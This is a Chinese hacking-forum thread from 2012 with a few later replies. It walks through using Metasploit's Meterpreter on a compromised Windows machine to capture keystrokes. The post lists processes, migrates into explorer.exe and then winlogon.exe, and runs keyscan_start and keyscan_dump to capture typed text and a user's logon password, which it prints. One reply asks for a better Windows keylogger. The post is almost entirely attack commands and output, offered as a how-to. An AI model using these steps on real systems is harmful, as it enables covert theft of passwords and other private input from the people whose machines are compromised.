切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
189 Metasploit 键盘记录[复制链接]
发表于 2012-10-3 20:02:01 | 显示全部楼层 |!read_mode!
转移进程
  1. meterpreter > ps
  2. Process list
  3. ============
  4. PID Name Arch Session User Path
  5. --- ---- ---- ------- ---- ----
  6. 0 [System Process]
  7. 1000 logon.scr x86 0 CHINA-XI4OJIN\xi4ojin E:\WINDOWS\System32\logon.scr
  8. 1052 svchost.exe x86 0 NT AUTHORITY\SYSTEM E:\WINDOWS\System32\svchost.exe
  9. 1100 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE E:\WINDOWS\system32\svchost.exe
  10. 1152 ctfmon.exe x86 0 CHINA-XI4OJIN\xi4ojin E:\WINDOWS\system32\ctfmon.exe
  11. 1160 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE E:\WINDOWS\system32\svchost.exe
  12. 1260 taskmgr.exe x86 0 CHINA-XI4OJIN\xi4ojin E:\WINDOWS\system32\taskmgr.exe
  13. 1412 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM E:\WINDOWS\system32\spoolsv.exe
  14. 1564 explorer.exe x86 0 CHINA-XI4OJIN\xi4ojin E:\WINDOWS\Explorer.EXE
  15. 1620 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE E:\WINDOWS\System32\alg.exe
  16. 2040 putty.exe x86 0 CHINA-XI4OJIN\xi4ojin E:\Documents and Settings\xi4ojin\Desktop\putty.exe
  17. 4 System x86 0 NT AUTHORITY\SYSTEM
  18. 472 VMwareService.exe x86 0 NT AUTHORITY\SYSTEM E:\Program Files\VMware\VMware Tools\VMwareService.exe
  19. 496 wuauclt.exe x86 0 CHINA-XI4OJIN\xi4ojin E:\WINDOWS\system32\wuauclt.exe
  20. 560 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
  21. 584 VMwareTray.exe x86 0 CHINA-XI4OJIN\xi4ojin E:\Program Files\VMware\VMware Tools\VMwareTray.exe
  22. 604 VMwareUser.exe x86 0 CHINA-XI4OJIN\xi4ojin E:\Program Files\VMware\VMware Tools\VMwareUser.exe
  23. 632 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\E:\WINDOWS\system32\csrss.exe
  24. 656 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\E:\WINDOWS\system32\winlogon.exe
  25. 700 services.exe x86 0 NT AUTHORITY\SYSTEM E:\WINDOWS\system32\services.exe
  26. 712 lsass.exe x86 0 NT AUTHORITY\SYSTEM E:\WINDOWS\system32\lsass.exe
  27. 868 svchost.exe x86 0 NT AUTHORITY\SYSTEM E:\WINDOWS\system32\svchost.exe
  28. 936 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE E:\WINDOWS\system32\svchost.exe

  29. meterpreter > migrate 1564
  30. [*] Migrating to 1564...
  31. [*] Migration completed successfully
复制代码

启动模块
  1. meterpreter > keyscan_start
  2. Starting the keystroke sniffer...
  3. meterpreter > keyscan_dump
  4. Dumping captured keystrokes...
  5. fuzzexp.org <Return>
  6. meterpreter >
复制代码

记录登陆用户密码 转移到  winlogon.exe
meterpreter > ps

  1. Process list
  2. ============
  3. PID Name Arch Session User Path
  4. --- ---- ---- ------- ---- ----
  5. 0 [System Process]
  6. 656 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\E:\WINDOWS\system32\winlogon.exe

  7. meterpreter > migrate 656
  8. [*] Migrating to 656...
  9. [*] Migration completed successfully.
复制代码
启动模块
  1. meterpreter > keyscan_start
  2. Starting the keystroke sniffer...
  3. meterpreter > keyscan_dump
  4. Dumping captured keystrokes...
  5. fuckhelen <Return>
  6. meterpreter >
复制代码

密码 fuckhelen
参考:http://baike.baidu.com/view/449981.htm




操千曲而后晓声,观千剑而后识器。
发表于 2014-9-19 14:00:31 | 显示全部楼层
这个唯一不好的地方就是电脑要一直开着,楼主 还有没有好的键盘记录器win??
发表于 2014-12-30 10:18:00 | 显示全部楼层
为什么看不到?
发表于 2015-1-12 22:12:54 | 显示全部楼层
因为你是酱油党

代码区

GMT+8, 2020-9-28 10:03

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部